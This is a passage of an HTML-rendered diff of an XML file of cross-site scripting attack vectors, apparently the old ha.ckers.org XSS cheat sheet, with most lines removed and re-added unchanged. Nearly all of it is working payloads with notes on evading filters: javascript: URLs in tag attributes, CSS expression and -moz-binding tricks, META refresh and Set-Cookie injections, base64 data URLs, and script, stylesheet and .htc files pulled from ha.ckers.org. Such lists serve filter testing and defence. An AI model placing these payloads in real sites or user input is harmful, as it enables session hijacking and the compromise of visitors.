- <code><TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE></code>
- <desc>TD background.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>XML namespace</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></code>
+ <desc>IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop).</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>List-style-image</name>
+ <code><STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</code>
+ <desc>Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG w/VBscript</name>
+ <code><IMG SRC='vbscript:msgbox("XSS")'></code>
+ <desc>VBscript in an image</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>LAYER</name>
+ <code><LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER></code>
+ <desc>Layer (Older Netscape only)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
+ </attack>
+ <attack>
+ <name>Livescript</name>
+ <code><IMG SRC="livescript:[code]"></code>
+ <desc>Livescript (Older Netscape only)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
+ </attack>
+ <attack>
+ <name>US-ASCII encoding</name>
+ <code>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE</code>
+ <desc>Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="ns">NS4</span>]</browser>
+ </attack>
+ <attack>
+ <name>META</name>
+ <code><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"></code>
+ <desc>The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>META w/data:URL</name>
+ <code><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></code>
+ <desc>This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>META w/additional URL parameter</name>
+ <code><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"></code>
+ <desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an "http://" you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Mocha</name>
+ <code><IMG SRC="mocha:[code]"></code>
+ <desc>Mocha (Older Netscape only)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
+ </attack>
+ <attack>
+ <name>OBJECT</name>
+ <code><OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT></code>
+ <desc>If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>OBJECT w/Embedded XSS</name>
+ <code><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT></code>
+ <desc>Using an OBJECT tag you can embed XSS directly (this is unverified).</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support:</browser>
+ </attack>
+ <attack>
+ <name>Embed Flash</name>
+ <code><EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED></code>
+ <desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>OBJECT w/Flash 2</name>
+ <code>a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);</code>
+ <desc>Using this action script inside flash can obfuscate your XSS vector.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>STYLE</name>
+ <code><STYLE TYPE="text/javascript">alert('XSS');</STYLE></code>
+ <desc>STYLE tag (Older versions of Netscape only)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
+ </attack>
+ <attack>
+ <name>STYLE w/Comment</name>
+ <code><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"></code>
+ <desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>STYLE w/Anonymous HTML</name>
+ <code><XSS STYLE="xss:expression(alert('XSS'))"></code>
+ <desc>Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>STYLE w/background-image</name>
+ <code><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A></code>
+ <desc>STYLE tag using background-image.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>STYLE w/background</name>
+ <code><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE></code>
+ <desc>STYLE tag using background.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Stylesheet</name>
+ <code><LINK REL="stylesheet" HREF="javascript:alert('XSS');"></code>
+ <desc>Stylesheet</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Remote Stylesheet 1</name>
+ <code><LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"></code>
+ <desc>Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Remote Stylesheet 2</name>
+ <code><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE></code>
+ <desc>Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Remote Stylesheet 3</name>
+ <code><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"></code>
+ <desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Remote Stylesheet 4</name>
+ <code><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE></code>
+ <desc>Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>TABLE</name>
+ <code><TABLE BACKGROUND="javascript:alert('XSS')"></TABLE></code>
+ <desc>Table background (who would have thought tables were XSS targets... except me, of course).</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>TD</name>
+ <code><TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE></code>
+ <desc>TD background.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>XML namespace</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><HTML xmlns:xss>
</span><span class="cx" style="display: block; padding: 0 10px"> <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
</span><span class="cx" style="display: block; padding: 0 10px"> <xss:xss>XSS</xss:xss>
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-</HTML></code>
- <desc>XML namespace. The .htc file must be located on the server as your XSS vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>XML data island w/CDATA</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+</HTML></code>
+ <desc>XML namespace. The .htc file must be located on the server as your XSS vector.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>XML data island w/CDATA</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></code>
- <desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>XML data island w/comment</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></code>
+ <desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>XML data island w/comment</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></code>
- <desc>XML data island with comment obfuscation (doesn't use CDATA fields, but rather uses comments to break up the javascript directive)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>XML (locally hosted)</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></code>
+ <desc>XML data island with comment obfuscation (doesn't use CDATA fields, but rather uses comments to break up the javascript directive)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>XML (locally hosted)</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></code>
- <desc>Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>XML HTML+TIME</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></code>
+ <desc>Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>XML HTML+TIME</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><HTML><BODY>
</span><span class="cx" style="display: block; padding: 0 10px"> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
</span><span class="cx" style="display: block; padding: 0 10px"> <?import namespace="t" implementation="#default#time2">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML></code>
- <desc>HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Commented-out Block</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML></code>
+ <desc>HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Commented-out Block</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><!--[if gte IE 4]>
</span><span class="cx" style="display: block; padding: 0 10px"> <SCRIPT>alert('XSS');</SCRIPT>
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-<![endif]--></code>
- <desc>Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job.</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Cookie Manipulation</name>
- <code><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"></code>
- <desc>Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc).</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Local .htc file</name>
- <code><XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"></code>
- <desc>This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute.</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Rename .js to .jpg</name>
- <code><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT></code>
- <desc>Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector.</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>SSI</name>
- <code><!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--></code>
- <desc>SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues.</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>PHP</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+<![endif]--></code>
+ <desc>Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job.</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Cookie Manipulation</name>
+ <code><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"></code>
+ <desc>Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc).</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Local .htc file</name>
+ <code><XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"></code>
+ <desc>This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute.</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Rename .js to .jpg</name>
+ <code><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT></code>
+ <desc>Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector.</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>SSI</name>
+ <code><!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--></code>
+ <desc>SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues.</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>PHP</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><? echo('<SCR)';
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-echo('IPT>alert("XSS")</SCRIPT>'); ?></code>
- <desc>PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues.</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>JavaScript Includes</name>
- <code><BR SIZE="&{alert('XSS')}"></code>
- <desc>&JavaScript includes (works in Netscape 4.x).</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
- </attack>
- <attack>
- <name>Character Encoding Example</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+echo('IPT>alert("XSS")</SCRIPT>'); ?></code>
+ <desc>PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues.</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>JavaScript Includes</name>
+ <code><BR SIZE="&{alert('XSS')}"></code>
+ <desc>&JavaScript includes (works in Netscape 4.x).</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
+ </attack>
+ <attack>
+ <name>Character Encoding Example</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><
</span><span class="cx" style="display: block; padding: 0 10px"> %3C
</span><span class="cx" style="display: block; padding: 0 10px"> &lt
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -497,480 +497,480 @@
</span><span class="cx" style="display: block; padding: 0 10px"> \x3c
</span><span class="cx" style="display: block; padding: 0 10px"> \x3C
</span><span class="cx" style="display: block; padding: 0 10px"> \u003c
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-\u003C</code>
